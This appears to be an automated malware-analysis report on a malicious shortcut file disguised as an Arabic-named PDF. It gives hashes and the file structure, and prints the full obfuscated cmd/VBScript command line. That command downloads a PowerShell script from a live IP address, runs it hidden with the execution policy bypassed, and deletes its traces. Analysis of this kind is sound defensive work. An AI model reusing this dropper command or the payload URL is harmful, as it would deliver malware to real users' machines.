Malicious
Malicious
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
7754077ee9191839a971e99d38e9dc1a
Sha1
2eb2d5c3aa11524e031ae6dd6f1715b5c877cbd5
Sha256
7ccbda568ff313b5e75d20b3bad6b9191a5f5b53eb867d05150c732f5cb039c2
Sha384
a202e77dd2b128fe60a0afb3fc829c4a1ecc4158e2e7c74877b789fc80bb6b7b6a57754858d5d09dd77636a91c78f45f
Sha512
4798c3b2d4f5727f0f8fc63486ea9ceddb641eae85ecf25c3e273cbce6be724c85078e61d7f57887cbe11904e841dffe01ee2c00eb870ea207ddfe55ce7314be
SSDeep
24:foGX/ALDR5yW2RiqTeKT6CwD8Bx51WEn9+JkMRgRrT7UL3LXU5oG6V:f5vIRUVQqTelCUk51WU+KHhkLI56V
TLSH
F683AC9476E80304F1B5FE36CE7677864436BA80EE318B6C0AA4CC6C6951A01DC71F33
File Structure
7754077ee9191839a971e99d38e9dc1a
Malicious
إعداد_القادة.pdf.lnk
Malicious
LNK CommandLine
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Lnk Summary]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Lnk Summary].deobfuscated.vbs
Malicious
Artefacts
Name
 Value
LNK: Command Execution

cmd.exe /v /c "set "x1=MSXM" && set "x2=L2.XML" && set "v=!x1!!x2!HTTP" && echo Set h=CreateObject("!v!"):h.open "GET","http://178.16.53.53/Sohomon8200/moaningstring.ps1",False:h.setRequestHeader "User-Agent","UA WindowsPowerShell":h.send:Set b=CreateObject("ADO" ^& "DB.Str" ^& "eam"):b.Type=1:b.Open:b.Write h.responseBody:b.SaveToFile "%TEMP%\9qI2q2.ps1",2 > %TEMP%\cB.vbs && cscript //b %TEMP%\cB.vbs && powershell -NoP -W Hidden -ExecutionPolicy Bypass -File %TEMP%\9qI2q2.ps1 && del %TEMP%\cB.vbs %TEMP%\9qI2q2.ps1"
URLs in VB Code - #1

http://178.16.53.53/Sohomon8200/moaningstring.ps1
Deobfuscated PowerShell

Remove-Item "%TEMP%\cB.vbs" "%TEMP%\9qI2q2.ps1 IconLocation: imageres.dll"
Deobfuscated PowerShell

Remove-Item "%TEMP%\cB.vbs" "%TEMP%\9qI2q2.ps1"
7754077ee9191839a971e99d38e9dc1a (85.07 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙